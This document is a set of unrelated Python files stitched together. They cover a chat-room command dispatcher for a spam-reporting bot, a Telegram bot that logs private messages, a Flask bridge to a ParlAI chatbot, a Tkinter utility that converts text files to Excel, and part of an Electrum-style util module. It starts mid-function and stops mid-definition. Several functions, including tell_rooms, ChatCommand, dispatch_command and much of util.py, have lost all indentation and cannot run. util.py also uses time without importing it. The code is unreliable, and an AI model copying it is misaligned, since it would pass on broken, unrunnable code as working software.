                # Reply to one of our messages: strip the @mention span and
                # dispatch as a reply command.
                strip_mention = regex.sub("^(<span class=(\"|')mention(\"|')>)?@.*?(</span>)? ", "", message.content)
                cmd = GlobalVars.parser.unescape(strip_mention)

                result = dispatch_reply_command(message.parent, message, cmd)

                if result:
                    # Long single-line responses go on their own line to dodge
                    # the 500-char single-line limit.
                    s = ":{}\n{}" if "\n" not in result and len(result) >= 488 else ":{} {}"
                    _msg_queue.put((room_data, s.format(message.id, result), None))
        except ValueError:
            pass
    elif message.content.lower().startswith("sd "):
        result = dispatch_shorthand_command(message)

        if result:
            s = ":{}\n{}" if "\n" not in result and len(result) >= 488 else ":{} {}"
            _msg_queue.put((room_data, s.format(message.id, result), None))
    elif message.content.startswith("!!/") or message.content.lower().startswith("sdc "):
        result = dispatch_command(message)

        if result:
            s = ":{}\n{}" if "\n" not in result and len(result) >= 488 else ":{} {}"
            _msg_queue.put((room_data, s.format(message.id, result), None))
    elif classes.feedback.FEEDBACK_REGEX.search(message.content) \
            and is_privileged(message.owner, message.room) and datahandling.last_feedbacked:
        # Privileged feedback shortly after a report: post an auto-comment.
        ids, expires_in = datahandling.last_feedbacked

        if time.time() < expires_in:
            Tasks.do(metasmoke.Metasmoke.post_auto_comment, message.content_source, message.owner, ids=ids)
    elif 'direct' in _room_roles and room_ident in _room_roles['direct']:
        SocketScience.receive(message.content_source.replace("\u200B", "").replace("\u200C", ""))
def tell_rooms_with(prop, msg, notify_site="", report_data=None):
    """Broadcast *msg* to every room that has the given property."""
    wanted = (prop,)
    tell_rooms(msg, wanted, (), notify_site=notify_site, report_data=report_data)
def tell_rooms_without(prop, msg, notify_site="", report_data=None):
    """Broadcast *msg* to every room that does NOT have the given property."""
    unwanted = (prop,)
    tell_rooms(msg, (), unwanted, notify_site=notify_site, report_data=report_data)
def tell_rooms(msg, has, hasnt, notify_site="", report_data=None):
global _rooms
msg = msg.rstrip()
target_rooms = set()
# Go through the list of properties in "has" and add all rooms which have any of those properties
# to the target_rooms set. _room_roles contains a list of rooms for each property.
for prop_has in has:
if isinstance(prop_has, tuple):
# If the current prop_has is a tuple, then it's assumed to be a descriptor of a specific room.
# The format is: (_client.host, room.id)
target_rooms.add(prop_has)
if prop_has not in _room_roles:
# No rooms have this property.
continue
for room in _room_roles[prop_has]:
if all(map(lambda prop: prop not in _room_roles or room not in _room_roles[prop], hasnt)):
if room not in _rooms:
# If SD is not already in the room, then join the room.
site, roomid = room
deletion_watcher = room in _watcher_rooms
new_room = _clients[site].get_room(roomid)
new_room.join()
_rooms[room] = RoomData(new_room, -1, deletion_watcher)
target_rooms.add(room)
for room_id in target_rooms:
room = _rooms[room_id]
if notify_site:
pings = datahandling.get_user_names_on_notification_list(room.room._client.host,
room.room.id,
notify_site,
room.room._client)
msg_pings = datahandling.append_pings(msg, pings)
else:
msg_pings = msg
timestamp = time.time()
if room.block_time < timestamp and _global_block < timestamp:
if report_data and "delay" in _room_roles and room_id in _room_roles["delay"]:
def callback(room=room, msg=msg_pings):
post = fetch_post_id_and_site_from_url(report_data[0])[0:2]
if not datahandling.is_false_positive(post) and not datahandling.is_ignored_post(post):
_msg_queue.put((room, msg, report_data))
task = Tasks.later(callback, after=300)
GlobalVars.deletion_watcher.subscribe(report_data[0], callback=task.cancel)
else:
_msg_queue.put((room, msg_pings, report_data))
def get_last_messages(room, count):
    """Yield up to *count* of the most recent message objects for *room*, newest first."""
    key = (room._client.host, room.id)
    if key not in _last_messages.messages:
        return
    recent_ids = itertools.islice(reversed(_last_messages.messages[key]), count)
    for message_id in recent_ids:
        yield room._client.get_message(message_id)
def get_report_data(message):
    """Return report info for a bot message, or None when it is not a report.

    Prefers the cached entry in _last_messages.reports; otherwise falls back
    to parsing the post (and owner) URLs out of the message markup via the
    fetch_* helpers.
    """
    identifier = (message._client.host, message.id)
    if identifier in _last_messages.reports:
        return _last_messages.reports[identifier]
    else:
        post_url = fetch_post_url_from_msg_content(message.content_source)
        if post_url:
            # (post_url, owner_url) tuple, matching the cached-report shape.
            return (post_url, fetch_owner_url_from_msg_content(message.content_source))
def is_privileged(user, room):
    """True when *user* is whitelisted for *room* or is a moderator."""
    allowed_ids = _privileges[(room._client.host, room.id)]
    return user.id in allowed_ids or user.is_moderator
def block_room(room_id, site, time):
    """Suppress posting until *time*: per-room, or globally when room_id is None."""
    global _global_block
    if room_id is not None:
        _rooms[(site, room_id)].block_time = time
    else:
        _global_block = time
class ChatCommand:
def __init__(self, type_signature, reply=False, whole_msg=False, privileged=False,
arity=None, aliases=None, give_name=False):
self.type_signature = type_signature
self.reply = reply
self.whole_msg = whole_msg
self.privileged = privileged
self.arity = arity
self.aliases = aliases or []
self.give_name = give_name
self.__func__ = None
def __call__(self, *args, original_msg=None, alias_used=None, quiet_action=False):
disable_key = "no-" + self.__func__.__name__
try:
room_identifier = (original_msg.room._client.host, original_msg.room.id)
if disable_key in _room_roles and room_identifier in _room_roles[disable_key]:
return "This command is disabled in this room"
except AttributeError:
# Test cases in CI don't contain enough data
pass
if self.privileged and not is_privileged(original_msg.owner, original_msg.room):
return GlobalVars.not_privileged_warning
if self.whole_msg:
processed_args = [original_msg]
else:
processed_args = []
try:
try:
processed_args.extend(
[(coerce(arg) if arg else arg) for coerce, arg in zip(self.type_signature, args)])
except ValueError as e:
return "Invalid input type given for an argument"
if self.give_name:
result = self.__func__(*processed_args, alias_used=alias_used)
else:
result = self.__func__(*processed_args)
return result if not quiet_action else ""
except CmdException as e:
return str(e)
except Exception: # Everything else
log_exception(*sys.exc_info())
return "I hit an error while trying to run that command; run `!!/errorlogs` for details."
def __repr__(self):
return "{}({}, reply={}, whole_msg={}, privileged={}, arity={}, aliases={}, give_name={})" \
.format(
self.__class__.__name__, ", ".join([s.__name__ for s in self.type_signature]), self.reply,
self.whole_msg, self.privileged,
self.arity, self.aliases, self.give_name
)
def command(*type_signature, reply=False, whole_msg=False, privileged=False, arity=None, aliases=None, give_name=False):
aliases = aliases or []
def decorator(func):
f = ChatCommand(type_signature, reply, whole_msg, privileged, arity, aliases, give_name)
f.__func__ = func
cmd = (f, arity if arity else (len(type_signature), len(type_signature)))
if reply:
_reply_commands[func.__name__.replace('_', '-')] = cmd
for alias in aliases:
_reply_commands[alias] = cmd
else:
_prefix_commands[func.__name__.replace("_", "-")] = cmd
for alias in aliases:
_prefix_commands[alias] = cmd
return f
return decorator
def message(msg):
    """Type-signature coercion helper: pass a Message through unchanged.

    Fails with AssertionError for anything that is not a Message instance.
    """
    assert isinstance(msg, Message)
    return msg
def get_message(id, host="stackexchange.com"):
    """Fetch a chat message by numeric id from the client registered for *host*."""
    try:
        client = _clients[host]
    except KeyError:
        raise ValueError("Invalid host")
    return client.get_message(int(id))
def dispatch_command(msg):
command_parts = GlobalVars.parser.unescape(msg.content).split(" ", 1)
try:
if command_parts[0] == 'sdc':
command_parts = command_parts[1].split(" ", 1)
else:
command_parts[0] = command_parts[0][3:]
except IndexError:
return "Invalid command: Use either `!!/cmd_name` or `sdc cmd_name`" +\
" to run command `cmd_name`."
if len(command_parts) == 2:
cmd, args = command_parts
else:
cmd, = command_parts
args = ""
if cmd == "":
return
command_name = cmd.lower()
quiet_action = command_name[-1] == "-"
command_name = regex.sub(r"[[:punct:]]*$", "", command_name).replace("_", "-")
if command_name not in _prefix_commands:
return "No such command '{}'.".format(command_name)
else:
log('debug', 'Command received: ' + msg.content)
func, (min_arity, max_arity) = _prefix_commands[command_name]
if max_arity == 0:
return func(original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
elif max_arity == 1:
if min_arity == 1 and not args:
return "Missing an argument."
return func(args or None, original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
else:
args = args.split()
if len(args) < min_arity:
return "Too few arguments."
elif len(args) > max_arity:
return "Too many arguments."
else:
args.extend([None] * (max_arity - len(args)))
return func(*args, original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
def dispatch_reply_command(msg, reply, full_cmd, comment=True):
    """Run a reply command (one issued by replying to a bot message).

    :param msg: the bot message that was replied to
    :param reply: the user's reply containing the command text
    :param full_cmd: command text (mention already stripped by the caller)
    :param comment: when True and the text is not a known command, forward a
                    privileged user's reply to metasmoke as a comment
    :returns: the command's textual result, or None
    """
    command_parts = full_cmd.split(" ", 1)
    if len(command_parts) == 2:
        cmd, args = command_parts
    else:
        cmd, = command_parts
        args = ""
    cmd = cmd.lower()
    # A trailing "-" means "run quietly" (suppress the confirmation output).
    quiet_action = cmd[-1] == "-"
    cmd = regex.sub(r"\W*$", "", cmd)
    if cmd in _reply_commands:
        func, (min_arity, max_arity) = _reply_commands[cmd]
        # Reply commands always take the replied-to message as first argument.
        assert min_arity == 1
        if max_arity == 1:
            return func(msg, original_msg=reply, alias_used=cmd, quiet_action=quiet_action)
        elif max_arity == 2:
            return func(msg, args, original_msg=reply, alias_used=cmd, quiet_action=quiet_action)
        else:
            # Pad missing optional arguments with None up to max_arity.
            args = args.split()
            args.extend([None] * (max_arity - len(args)))
            return func(msg, *args, original_msg=reply, alias_used=cmd, quiet_action=quiet_action)
    elif comment and is_privileged(reply.owner, reply.room):
        # Not a command: a privileged user's reply on a report is forwarded
        # to metasmoke as an auto-comment on the reported post.
        post_data = get_report_data(msg)
        if post_data:
            Tasks.do(metasmoke.Metasmoke.post_auto_comment, full_cmd, reply.owner, url=post_data[0])
def dispatch_shorthand_command(msg):
    """Handle "sd <cmd> <cmd> ..." shorthand: apply each command to the room's
    most recent messages, newest first.

    A numeric prefix repeats a command (e.g. "2k" expands to "k", "k"), and
    "-" skips the corresponding message.  Returns the combined per-message
    output, or None when no command produced any output.
    """
    commands = shlex.split(GlobalVars.parser.unescape(msg.content).lower())[1:]
    if len(commands) == 0:
        return
    output = []
    processed_commands = []
    for cmd in commands:
        # Split an optional repeat count off the front of each token.
        count, cmd = regex.match(r"^(\d*)(.*)", cmd).groups()
        for _ in range(int(count) if count else 1):
            processed_commands.append(cmd)
    should_return_output = False
    # Pair each expanded command with one of the room's latest messages.
    for current_command, message in zip(processed_commands, get_last_messages(msg.room, len(processed_commands))):
        if current_command == "-":
            output.append("[:{}] <skipped>".format(message.id))
        else:
            result = dispatch_reply_command(message, msg, current_command, comment=False)
            if result:
                should_return_output = True
                output.append("[:{}] {}".format(message.id, result))
            else:
                output.append("[:{}] <processed without return value>".format(message.id))
    if should_return_output:
        return "\n".join(output)
|
message_handler.py | import threading
from time import sleep
import kernel
def bot_polling():
    # Self-healing polling loop: any polling failure tears the bot down,
    # backs off for one timeout period, and rebuilds a fresh Kernel.
    # A clean return from polling() stops the bot and exits the loop.
    while True:
        app = kernel.Kernel()
        try:
            bot_actions(app)
            app.bot.polling(none_stop=True, interval=app.BOT_INTERVAL_POLLING, timeout=app.BOT_TIMEOUT_POLLING)
        except Exception as ex:
            # Best-effort recovery: stop, wait, then loop around to restart.
            app.bot.stop_polling()
            sleep(app.BOT_TIMEOUT_POLLING)
        else:
            # polling() returned normally -> shut down for good.
            app.bot.stop_polling()
            break
def user_message_log(app, message):
    """Append a human-readable record of a Telegram *message* to the log file.

    Writes the message metadata (ids, sender names, date) followed by the
    message text.  Non-text messages carry ``message.text == None``, which the
    original ``file.write(message.text)`` crashed on; an empty string is
    logged instead.  The file is opened as UTF-8 so non-ASCII names survive.
    """
    fields = (
        ('message_id', message.message_id),
        ('user_id', message.from_user.id),
        ('first_name', message.from_user.first_name),
        ('last_name', message.from_user.last_name),
        ('username', message.from_user.username),
        ('date', message.date),
    )
    with open(app.FILE_USER_MESSAGE_LOG_NAME, 'a', encoding='utf-8') as file:
        file.write('-------------------\n')
        for name, value in fields:
            file.write("{0}: {1}\n".format(name, value))
        file.write('-------------------\n')
        file.write(message.text or '')
        file.write('\n-------------------\n')
        file.write('\n\n\n')
def bot_actions(app):
    # Register all Telegram handlers on the freshly created kernel instance.

    @app.bot.message_handler(commands=['start', 'help'])
    def send_welcome(message):
        # /start and /help: send the canned help texts.
        app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_START_HELP)
        app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_START_HELP_INFO_LOG)
        app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_START_HELP_EMOJI)

    @app.bot.message_handler(content_types=['new_chat_members'])
    def register_group(message):
        # Someone joined a chat: record the group id, announcing only when
        # add_group() reports it was newly added.
        is_add_group = app.sqlite.add_group(message.chat.id)
        if is_add_group:
            app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_REGISTER_GROUP)
            app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_REGISTER_GROUP_EMOJI)

    @app.bot.message_handler(func=lambda message: message.chat.type == 'private')
    def message_log(message):
        # Private messages are appended to the log file and acknowledged.
        user_message_log(app=app, message=message)
        app.bot.reply_to(message, app.BOT_MESSAGE_SEND_START_HELP_INFO_LOG_DONE)
# Run the polling loop on a daemon thread so the main thread stays free
# (and the process can die even if polling is wedged).
polling_thread = threading.Thread(target=bot_polling)
polling_thread.daemon = True
polling_thread.start()

if __name__ == "__main__":
    """https://gist.github.com/David-Lor/37e0ae02cd7fb1cd01085b2de553dde4"""
    # Keep the main thread alive so the daemonized polling thread keeps
    # running; Ctrl-C breaks the loop and lets the process exit.
    while True:
        try:
            sleep(120)
        except KeyboardInterrupt:
            break
|
api.py | import flask
import requests
import argparse
import json
import websockets
import uuid
import asyncio
import logging
import re
import threading
from flask import Flask, request, jsonify
logging.basicConfig(filename='parlai_api.log', level=30)
parser = argparse.ArgumentParser(description="Simple API for ParlAI chat bot")
parser.add_argument('--hostname', default="localhost", help="ParlAI web server hostname.")
parser.add_argument('--port', type=int, default=8081, help="ParlAI web server port.")
parser.add_argument('--serving_hostname', default="0.0.0.0", help="API web server hostname.")
parser.add_argument('--serving_port', type=int, default=8080, help="API web server port.")
args = parser.parse_args()
hostname = args.hostname
port = args.port
serving_hostname = args.serving_hostname
serving_port = args.serving_port
app = Flask(__name__)
blueprint = flask.Blueprint('parlai_api', __name__, template_folder='templates')
connections = {}
websocket_uri = f"ws://{hostname}:{port}/websocket"
running = False
# NOTE(review): this list shadows the `requests` HTTP library imported above
# for the rest of the module; rename it (e.g. pending_requests) once all
# references can be updated together.
requests = []
# request_id -> result dict, filled in by the ParlaiAPI.parse worker thread.
responses = {}
def get_random_id():
    """Return a fresh UUID4 string used to pair a queued request with its response."""
    return "{}".format(uuid.uuid4())
def format_message(message):
    """Cosmetically clean up a bot reply.

    - glue detached apostrophes ("it 's" -> "it's")
    - drop the space before punctuation ("hi ," -> "hi,")
    - capitalize the first letter of each sentence and of the message

    Fixes: regex patterns are now raw strings (``"\\s"`` in a plain literal is
    an invalid escape sequence), and an empty message no longer raises
    IndexError on the final capitalization step.
    """
    # "word ' s" -> "word's"
    while match := re.search(r"\s'\s", message):
        message = message[:match.start()] + "'" + message[match.end():]
    # Remove the space before punctuation, keeping the punctuation itself.
    while match := re.search(r"\s[.?!,;:']", message):
        message = message[:match.start()] + message[match.end() - 1:]
    # Capitalize the first letter following sentence-ending punctuation.
    while match := re.search(r"[.?!]\s[a-z]", message):
        message = message[:match.end() - 1] + message[match.end() - 1].capitalize() + message[match.end():]
    if message:
        message = message[0].capitalize() + message[1:]
    return message
class ParlaiAPI:
    """Bridges the Flask request queue to the ParlAI websocket server.

    Flask handlers append ``[request_id, coroutine_factory]`` entries to the
    module-level ``requests`` list; the ``parse`` worker thread executes them
    one at a time and publishes results into ``responses``.
    """

    @staticmethod
    def parse():
        """Worker loop: drain the request queue forever on a private event loop."""
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        while True:
            if not requests:
                # FIX: yield the CPU instead of busy-spinning at 100% while idle.
                loop.run_until_complete(asyncio.sleep(0.01))
                continue
            request_id, make_request = requests.pop(0)
            responses[request_id] = loop.run_until_complete(make_request())

    @staticmethod
    async def send_message(user_message, message_history=None, persona=False):
        """Send one utterance (optionally as a persona line) to the ParlAI
        server and return its JSON reply; on any failure return the error
        text in the same ``{'text': ...}`` shape.

        FIX: ``message_history`` previously used a mutable default argument.
        """
        if persona:
            message = "your persona: "
        else:
            message = ""
        message += user_message
        request_dict = {"text": message, "message_history": message_history or []}
        request_string = json.dumps(request_dict)
        request_bytes = bytes(request_string, encoding="UTF-8")
        print(request_bytes)
        try:
            async with websockets.connect(websocket_uri) as ws:
                await ws.send(request_bytes)
                response = await ws.recv()
                response = json.loads(response)
                print(response)
                try:
                    # Best-effort cleanup; keep the raw text if formatting fails.
                    response['text'] = format_message(response['text'])
                except Exception as e:
                    print(e)
                return response
        except Exception as e:
            return {'text': str(e)}
@blueprint.route('/api/send_message', methods=["POST"])
def send_message():
    """HTTP entry point: queue a chat request and block until the worker
    thread (ParlaiAPI.parse) publishes the response.

    Fixes: the wait loop now sleeps briefly instead of busy-spinning with
    ``pass``, the unused per-request event loop is gone, and the response is
    removed with a single ``pop``.
    """
    import time  # local import: the module does not import time at top level
    request_id = get_random_id()
    data = request.get_json()
    message_text = data.get('message_text', None)
    message_history = data.get('message_history', [])
    requests.append([request_id,
                     lambda: ParlaiAPI.send_message(message_text, message_history)])
    logging.warning(str(requests))
    # Poll until the worker thread has stored our answer.
    while request_id not in responses:
        time.sleep(0.01)
    return responses.pop(request_id)
@blueprint.route('/api/start_conversation', methods=["POST"])
def start_conversation():
    """DEPRECATED: conversations need no explicit start; kept for old clients."""
    return {'text': 'Hello!'}
@blueprint.route('/api/end_conversation', methods=["POST"])
def end_conversation():
    """DEPRECATED: conversations need no explicit end; kept for old clients."""
    return {'text': 'Goodbye!'}
async def main():
    # Start the queue-consumer worker, then serve the Flask API (blocking).
    thread = threading.Thread(target=ParlaiAPI.parse)
    thread.start()
    app.register_blueprint(blueprint)
    app.run(host=serving_hostname, port=serving_port)

# NOTE(review): main() contains no awaits; it is async only so it can be
# driven by run_until_complete here.
main_loop = asyncio.get_event_loop()
main_loop.run_until_complete(main())
|
TXT2EXCEL.py | # Author - Shane Carnahan
# Email - Shane.Carnahan1@gmail.com
# Date - 8/29/2018
# Project - TXT2EXCEL
# Module Version - 1.0
import glob, csv, xlwt, os, tkinter
from tkinter import *
from tkinter import messagebox
import tkinter.filedialog as filedialog
from pathlib import Path
from threading import Thread
from MyLogger import my_logger
import webbrowser
import time
'''
This utility will search the folder given as input for .txt files and will add them to tabs in an excel file.
The tabs will be named with the file name found.
'''
wb = xlwt.Workbook()
def help_docs():
    """Open the project documentation page in the default web browser."""
    docs_url = r"https://github.com/scarnahan1/Cisco_Config_Builder"
    webbrowser.open_new(docs_url)
    return
def about():
    """Pop up the About message box."""
    about_message = """
File compare utility created by Shane Carnahan (Shane.carnahan1@gmail.com).
"""
    messagebox.showinfo(title="About", message=about_message)
    return
def close():
    """Ask for confirmation, then destroy the main window and exit the process."""
    # FIX: the module never imports sys itself; the original call presumably
    # relied on `from tkinter import *` leaking a `sys` name — import it
    # explicitly here.  Also renamed the local `exit`, which shadowed the builtin.
    import sys
    confirmed = messagebox.askyesno(title="Quit", message="Are You Sure You Want To Be a Quitter?")
    if confirmed > 0:
        main_window.destroy()
        sys.exit(0)
    return
def path(location_entry, default_path):
    """Prompt the user for a directory, write it into *location_entry*, return it."""
    # Drop whatever path is currently shown in the entry box.
    location_entry.delete(0, 'end')
    chosen_dir = filedialog.askdirectory(initialdir=default_path)
    # Show the newly chosen directory in the entry box.
    location_entry.insert(END, chosen_dir)
    return chosen_dir
def gui_thread(site_name_entry, input_location_entry, output_location_entry, logger2, logger3):
    """Kick off the conversion on a worker thread so the GUI stays responsive."""
    logger2.debug("Called GUI Function...")
    worker = Thread(target=main_thread,
                    args=(site_name_entry, input_location_entry, output_location_entry, logger2, logger3))
    worker.start()
def main_thread(site_name_entry, input_location_entry, output_location_entry, logger2, logger3):
    """Convert every .txt file in the input folder into one worksheet each of
    a new .xls workbook and save it to the output folder.

    FIX: the original reused a single module-level ``wb = xlwt.Workbook()``,
    so a second run raised a duplicate-worksheet-name error; a fresh workbook
    is now created per run.  Paths are joined with os.path.join instead of
    manual '/' concatenation.
    """
    start_time = time.time()
    workbook = xlwt.Workbook()
    in_location = input_location_entry.get()
    out_location = output_location_entry.get()
    for filename in glob.glob(os.path.join(in_location, "*.txt")):
        (f_path, f_name) = os.path.split(filename)
        (f_short_name, f_extension) = os.path.splitext(f_name)
        # One worksheet per input file, named after the file (sans extension).
        ws = workbook.add_sheet(f_short_name)
        with open(filename, 'r') as f:
            for i, line in enumerate(f):
                ws.write(i, 0, line)
    outfile = os.path.join(out_location, site_name_entry.get() + "_Configs.xls")
    logger3.debug('Saving file {}...'.format(outfile))
    workbook.save(outfile)
    logger3.info('--- {} seconds ---'.format(time.time() - start_time))
    logger3.info('Run Completed...')
def main(log_location):
# Set up our logging here
log_file_name = log_location + 'TXT2Excel.log'
# Set loggers for specific areas of the module
logger1 = my_logger('TXT2Excel.main', log_file_name)
logger2 = my_logger('TXT2Excel.gui_thread', log_file_name)
logger3 = my_logger('TXT2Excel.main_thread', log_file_name)
logger4 = my_logger('TXT2Excel.multiple_replace', log_file_name)
"""
Get the path to the users Documents folder
Assumes that this is a Windows 10 machine and the user has a Documents folder.
"""
default_path = ""
try:
userprofile = os.environ.get('USERPROFILE') # This should work for windows OS
logger1.debug(userprofile)
default_path = userprofile + "\\" + "Documents"
logger1.debug(default_path)
except:
userprofile = str(Path.home()) # This should work for MAC and probably Linux
default_path = userprofile + "/" + "Documents"
logger1.debug(default_path)
# GUI Things
global main_window
main_window = tkinter.Tk()
main_window.title('TXT2Excel')
site_name_text = Label(main_window, text="Site Name/Code")
site_name_text.grid(row=1, column=0, sticky=W)
site_name_entry = Entry(main_window)
site_name_entry.grid(row=1, column=1, sticky=W)
site_name_entry.insert(END, 'BOP')
input_location_text = Label(main_window, text="Select the input path")
input_location_text.grid(row=3, column=0, sticky=W)
input_location_entry = Entry(main_window, width=30)
input_location_entry.grid(row=3, column=1, sticky=W)
input_location_entry.insert(END, default_path)
open_file = Button(main_window, command=lambda: path(input_location_entry, default_path), padx=1, text="Select input Path")
open_file.grid(row=3, column=2, sticky=W)
output_location_text = Label(main_window, text="Select the output path")
output_location_text.grid(row=4, column=0, sticky=W)
output_location_entry = Entry(main_window, width=30)
output_location_entry.grid(row=4, column=1, sticky=W)
output_location_entry.insert(END, default_path)
open_file = Button(main_window, command=lambda: path(output_location_entry, default_path), padx=1, text="Select Output Path")
open_file.grid(row=4, column=2, sticky=W)
# Let's Go!
attempt = Button(text="OK", command=lambda: gui_thread(site_name_entry, input_location_entry, output_location_entry, logger2, logger3))
attempt.grid(row=10, column=0, sticky=W)
exit = Button(text="Close", command=close)
exit.grid(row=10, column=1, sticky=W)
""" Playing with Menu ideas. This may get ripped out in the end but wanted to give it a try for now. """
# Menu Construction
menubar = Menu(main_window)
filemenu = Menu(menubar, tearoff=0)
# filemenu.add_command(label="New", command=new) # New would be a function similar to a button
# filemenu.add_command(label="Open")
# filemenu.add_command(label="Save As..")
filemenu.add_command(label="Close", command=close)
menubar.add_cascade(label="File", menu=filemenu)
main_window.config(menu=menubar)
# Edit Menu
# editmenu = Menu(menubar, tearoff=0)
# editmenu.add_command(label='Edit', command=edit)
# menubar.add_cascade(label="Edit", menu=editmenu)
# Help Menu
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label="Help Docs", command=help_docs)
helpmenu.add_command(label="About", command=about)
menubar.add_cascade(label="Help", menu=helpmenu)
# Main Starter required for Windows machines
main_window.mainloop()
if __name__ == "__main__":
log_location = './LOGS/'
main(log_location)
|
util.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os, sys, re, json
import platform
import shutil
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urlparse
import urllib
import threading
from i18n import _
# FIX: the original literal repeated the 'ZEIT' key three times; duplicate
# dict keys silently collapse into one entry, so spell it once.
base_units = {'ZEIT': 8}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
    """Turn a version string like "3.2.0" into [3, 2] so versions compare numerically."""
    trimmed = re.sub(r'(\.0+)*$', '', v)
    return [int(part) for part in trimmed.split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
is_verbose = False
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
    """Write all arguments, stringified and space separated, to stdout and flush."""
    text = " ".join(map(str, args))
    sys.stdout.write(text + "\n")
    sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
    """Parse JSON text, decoding floats as Decimal; return *x* unchanged on failure.

    FIX: the original passed ``parse_float=decimal.Decimal`` although only
    ``from decimal import Decimal`` is in scope, so every call raised
    NameError, fell into the bare except, and silently returned the raw
    string.  Use the imported ``Decimal`` and only swallow parse errors.
    """
    try:
        return json.loads(x, parse_float=Decimal)
    except (TypeError, ValueError):
        return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.func_name
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_path():
path = android_ext_dir() + '/org.electrum.electrum/blockchain_headers'
d = os.path.dirname(path)
if not os.path.exists(d):
os.mkdir(d)
return path
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_path()
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_path(config):
